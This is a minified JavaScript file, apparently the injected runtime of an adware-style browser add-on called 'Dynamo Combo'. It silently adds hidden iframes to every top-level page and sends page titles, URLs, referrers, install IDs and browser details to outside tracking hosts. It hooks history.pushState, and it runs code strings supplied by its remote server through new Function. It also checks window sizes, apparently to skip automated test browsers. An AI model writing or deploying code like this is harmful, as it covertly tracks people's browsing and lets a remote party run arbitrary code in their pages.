(function(){function B(b,a,c){if(b instanceof Array){if("undefined"!=typeof Array.prototype.indexOf)return b.indexOf(a,c);c=c||0;var d=b.length;if(c>=d)return-1;for(0>c&&(c=Math.max(d+c,0));c<d;c++)if(b[c]===a)return c}return-1}function C(){for(var b=0;b<L.length;b++){var a=L[b].exec(navigator.userAgent);if(a)return b=a.splice(1,2),2>b.length&&b.push("0"),"undefined"!==typeof b[1]&&(a=parseInt(b[1]))&&(b[1]=a),b}return["Unknown","0"]}function M(b){var a={rawName:"Unknown",rawVersion:"0",name:"Unknown",
version:"0"};if(!1==!!b||2>b.length)return a;a.name=a.rawName=b[0];a.version=a.rawVersion=b[1].toString();b=a.version.indexOf(".");-1!==b&&(a.version=a.version.substring(0,b));b=a.rawName.toLowerCase();switch(b){case "mrchrome":a.name="Amigo";break;case "opr":a.name="Opera";break;case "yabrowser":a.name="Yandex";break;case "ir":a.name="Rocket"}0==b.indexOf("msie")?a.name="MSIE":0==b.indexOf("trident")&&(a.name="MSIE",a.version="11");return a}function w(b,a){if(b.constructor){var c=b.constructor.prototype[a],
d=typeof c;if("function"==d||l&&9>l&&"object"==d)return function(){return c.apply(b,arguments)}}if(l&&8>l&&b===h)try{return eval(T.join(a))}catch(e){}return b[a]}function r(b,a){var c=f.createElement("script");c.type="text/javascript";c.src=b;c.onload=c.onreadystatechange=function(){if(!this.readyState||"loaded"==this.readyState||"complete"==this.readyState){c.onload=c.onreadystatechange=null;c.parentNode.removeChild(c);try{"function"==typeof a&&a()}catch(b){}}};(f.body||f.head).appendChild(c)}function U(b,
a,c){var d=p+1E20*Math.random();h[d]=c;r(b+(0<b.indexOf("?")?"&":"?")+a+"="+d,function(){try{delete h[d]}catch(a){}})}function D(b,a){for(var c={},d=b.search.substr(1).split("&"),e=0;e<d.length;e++){var k=d[e].split("=");c[decodeURIComponent(k[0])]=2==k.length?decodeURIComponent(k[1]):""}return c[a]}function x(b){for(var a=[],c=0;c<b.length;c++){var d=!0===b[c].stripPii?N(b[c].data):b[c].toString();a.push(encodeURIComponent(d.replace(/,/g,"$cma;")))}f.images&&((new Image).src=V+a.shift()+"="+a.join("|,|"))}
function W(b){var a;window.history&&(a=window.history,E=a.pushState,a.pushState=function(c){"function"==typeof a.a&&a.a({state:c});b();return E.apply(a,arguments)})}function N(b){for(var a in F)F.hasOwnProperty(a)&&(b=b.replace(F[a],"{piiRem"+a+"}"));return b}function v(b,a,c){if(b.addEventListener)return b.addEventListener(a,c,!1);if(b.attachEvent)return b.attachEvent("on"+a,c)}function y(b,a,c){if(b.removeEventListener)return b.removeEventListener(a,c,!1);if(b.detachEvent)return b.detachEvent("on"+
a,c)}function X(b){if("function"==typeof O)return O(b);for(var a,c=0,d=z,e="";b.charAt(c|0)||(d="=",c%1);e+=d.charAt(63&a>>8-c%1*8))a=a<<8|b.charCodeAt(c-=-.75);return e}function Y(b){for(var a=0,c="";a<b.length;)var d=parseInt(b.charAt(a++),16)<<8|parseInt(b.charAt(a++),16)<<4|parseInt(b.charAt(a++),16),e=d&63,c=c+z.charAt(d>>6),c=c+z.charAt(e);for(;c.length%4;)c+=z.charAt(64);return c}function Z(b){function a(a,d){try{"undefined"==typeof t[b]&&(t[b]=d?a+"-"+d:a)}catch(e){}}return{abort:function(b){a("abort",
b)},exception:function(b){a("exception",b)},success:function(b){a("success",b)}}}function $(b,a,c,d){var e=Z(d);return function(){try{(new Function("client","defaultSettings","customSettings","report",c))(g,b,a,e)}catch(k){e.exception(k)}}}function P(b){for(var a=0;a<b.length;a++){var c=b[a];Q($(c.defaultSettings,c.customSettings,c.init,c.id),0)}}function G(){y(h,"unload",G);var b;window.history&&(b=window.history,b.pushState=E);if(!(.001<Math.random())){b=[];for(var a in t)t.hasOwnProperty(a)&&b.push(a+
":"+t[a]);a=g.geo&&"string"==typeof g.geo.countryCode?g.geo.countryCode.toLowerCase():"";b=["InitState",g.guid,f.location.host,f.location.href].concat(C(),a,g.urlCategories?g.urlCategories.join("|"):"",b.join("|"),(new Date).getTime());x(b)}}function R(){for(var b=p+"_1",a=b,c="https:"==f.location.protocol,d=f.getElementsByTagName("script"),e=0;e<d.length;e++)if(-1<d[e].src.indexOf(aa+"/gsrs")&&"1"!=d[e].getAttribute("d")&&(a=f.createElement("a"),a.href=d[e].src,g.guid=D(a,"g"),g.installSource=D(a,
"is"),n=D(a,"bp"),a=b+n,m=f.getElementById(a),!m)){d[e].setAttribute("d","1");break}var k=f.getElementById(b),e=d=!1;k?(d=!1,b=k.getAttribute("t"),-1==b.split("|").indexOf(n)&&(k.setAttribute("t",b+"|"+n),e=!0)):(k=f.createElement("iframe"),k.id=b,k.setAttribute("t",n),k.style.width="1px",k.style.height="1px",k.style.display="none",f.body.appendChild(k),d=e=!0);b=M(C());e&&x(["Runtime_Ran_2",p,g.guid,n,b.name.substr(0,1E3),b.version.substr(0,1E3),c]);for(var c=N(f.title||"").substr(0,1E3),k=[[790,
482,0,0],[1024,704,0,0],[1024,697,-8,-8],[1024,706,0,0],[1024,670,0,0],[790,446,0,0],[1024,707,0,0],[1024,669,0,0],[790,518,0,0],[1024,670,0,0],[1024,671,0,0],[1024,632,0,0],[1024,633,0,0],[752,478,4,4],[1024,668,0,0],[1024,666,0,0],[1024,702,0,0],[1024,634,0,0]],e=0,u=k.length;e<u;e++)if(-1<b.name.toLowerCase().indexOf("chrome")&&h.innerWidth==k[e][0]&&h.innerHeight==k[e][1]&&h.screenX==k[e][2]&&h.screenY==k[e][3])return x(["SkippedRender_2",g.guid||"",p,c,h.location.href.substr(0,4E3),"Platform",
b.name.substr(0,1E3),b.version.substr(0,1E3),"00","1"]);m=f.createElement("iframe");m.id=a;m.style.width="1px";m.style.height="1px";m.style.display="none";m.src="https:"+H+"/gscf?n="+encodeURIComponent((h.name||"").substr(0,1E3))+"&t="+encodeURIComponent(c)+"&r="+encodeURIComponent((f.referrer||"").substr(0,4E3))+"&g="+encodeURIComponent(g.guid||"")+"&is="+encodeURIComponent(g.installSource||"")+"&bp="+encodeURIComponent(n||"BF")+"&l="+encodeURIComponent(!0==d?"1":"0");m.setAttribute("t",n);f.body.appendChild(m)}
function ba(b){try{var a=b.data;"string"==typeof a&&(a=q.parse(a));if(a.ext&&a.ext==p){if(m&&b.source==m.contentWindow)if("userdata"==a.msg&&a.installSource&&a.appData){g.installSource=a.installSource;g.ip=a.ip;g.geo=a.geo;g.bid=a.bucketId;g.token=a.token;I=a.appData;for(var c=0;c<I.length;c++){var d=I[c];d.id==ca&&(g.tc=!0);(d.blacklistCategories.length||d.whitelistCategories.length||!d.skipUrlCategorization?A:J).push(d)}J.length&&P(J);A.length&&(c={ext:p,msg:"getcategory"},m.contentWindow.postMessage(!l||
9<l?c:q.stringify(c),"*"));v(h,"unload",G);W(G)}else if("category"==a.msg&&a.categoryData){g.urlCategories=a.categoryData.categories;g.isBadCategory=a.categoryData.isBadCategory;g.isBadUrl=a.categoryData.isBadUrl;g.isBadUrlCategory=g.isBadCategory||g.isBadUrl;for(var c=a.categoryData.categories,d=[],e=0;e<A.length;e++){var k=A[e],u;a:{for(var f=c,n=k.blacklistCategories,K=k.whitelistCategories,s=0;s<K.length;s++)if(-1<B(f,K[s])){u=!0;break a}for(s=0;s<n.length;s++)if(-1<B(f,n[s])){u=!1;break a}u=
!K.length||!!n.length}u&&d.push(k)}d.length&&P(d)}if(b.source==h)if("getguid"==a.msg){var r={ext:p,msg:"guid",guid:g.guid,bf:!0};S(!l||9<l?r:q.stringify(r),"*")}else"statechange"==a.msg&&"number"==typeof a.appid&&"boolean"==typeof a.state&&m.contentWindow.postMessage(!l||9<l?a:q.stringify(a),"https:"+H)}}catch(t){}}var h=window,m,f=document,q,l=!1,p="Dynamo Combo",H="//api.dynamocombo.info",aa="//apidynamocomboin-a.akamaihd.net",I,n,V="//jsl.infostatsvc.com/?",z="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
T=["(function () {delete ","; return ",";})()"],E,L=[/\b(IR)\/([\d\.]+)\b/i,/\b(opr)\/([\d\.]+)\b/i,/\b(lunascape)[\/ ]([\d\.]+)\b/i,/\b(maxthon)\/([\d\.]+)\b/i,/\b(yabrowser)\/([\d\.]+)\b/i,/\b(mrchrome)\b/i,/\b(chrome)\/([\d\.]+)\b/i,/\b(msie)\s([\d\.]+)\b/i,/\b(trident)\/([\d\.]+)\b/i,/\b(firefox)\/([\d\.]+)\b/i,/\b(safari)\/([\d\.]+)\b/i,/\b(opera)\/([\d\.]+)\b/i],ca="1065";if(h.top==h){var A=[],J=[],t={},F={Email:/\b[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\b/ig,
LicNum:/(\d?[A-Z]{3}-?\d{3,4}|([A-Z]{1,3}(\d{2}-|-)[A-Z]?\d{2,4})|([A-Z]{1,2}\d{5,10}))/gi,PhnNum:/(\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}/g,LrgNum:/\b(?:\d[(). -]*?){9,16}\b/g},Q=w(h,"setTimeout"),O=w(h,"btoa"),S=w(h,"postMessage"),g=function(){function b(){y(f,"DOMContentLoaded",b);for(y(h,"load",b);a.length;)Q(a.pop(),0)}var a=[],c={},d=C(),e={};return{productName:p,webDomain:"dynamocombo.info",webCdnDomain:"wwwdynamocomboin-a.akamaihd.net",es:"1",
tc:!1,browser:M(d),utils:{addEventListener:v,arrayIndexOf:B,changeAppState:function(a,b){if("number"==typeof a&&"boolean"==typeof b){var c={ext:p,msg:"statechange",appid:a,state:b};S(!l||9<l?c:q.stringify(c),"*")}},removeEventListener:y,base64EncodeText:X,base64EncodeHex:Y,getNativeWindowFunction:w,loadScript:r,loadJSONP:U,log:x,ready:function(c){a.push(c);"complete"==f.readyState?b():(v(f,"DOMContentLoaded",b),v(h,"load",b))},require:function(a,b,d){switch(a){case "jquery":b=b||"1";c[a]&&c[a][b]?
"function"==typeof d&&d(c[a][b]):r("//ajax.googleapis.com/ajax/libs/jquery/"+b+"/jquery.min.js",function(){c[a]=c[a]||{};c[a][b]=h.jQuery.noConflict(!0);"function"==typeof d&&d(c[a][b])});break;case "swfobject":b=b||"2";if(c[a]&&c[a][b])"function"==typeof d&&d(c[a][b]);else{var g=h.swfobject;r("//ajax.googleapis.com/ajax/libs/swfobject/"+b+"/swfobject.js",function(){c[a]=c[a]||{};c[a][b]=h.swfobject;h.swfObject=g;"function"==typeof d&&d(c[a][b])})}break;case "dataman":var f=b;if(c[a]&&c[a][f])"function"==
typeof d&&d(c[a][f]);else{e[a]=e[a]||{};var l=e[a][f]=e[a][f]||[];l.push(d);if(1===l.length){var m="_"+p.replace(/\s/g,"_")+"Util";r(f+"/utils/js/"+m,function(){c[a]=c[a]||{};c[a][f]=window[m];for((new Function("delete "+m))();l.length;){var b=l.pop();"function"===typeof b&&b(c[a][f])}})}}}},setBucketId:function(a,b){if(b instanceof Date){var c={ext:p,msg:"setbucket",bid:a,exp:b.valueOf()};m.contentWindow.postMessage(!l||9<l?c:q.stringify(c),"https:"+H)}}},window:{name:h.name},getInstallId:function(){return this.guid},
getClientIP:function(){return this.ip}}}();(function(){var b=f.documentMode,a;try{delete f.documentMode,a=f.documentMode,f.documentMode=b}catch(c){}"number"==typeof a?l=a:"number"==typeof b&&(l=b);v(h,"message",ba);var d=h.JSON;"object"==typeof d&&"function"==typeof d.stringify&&"function"==typeof d.parse?(q=d,g.utils.JSON=q,g.utils.ready(R)):r("//cdnjs.cloudflare.com/ajax/libs/json3/3.2.4/json3.min.js",function(){q=h.JSON;g.utils.JSON=q;"undefined"!=typeof d&&(h.JSON=d);g.utils.ready(R)})})()}})();
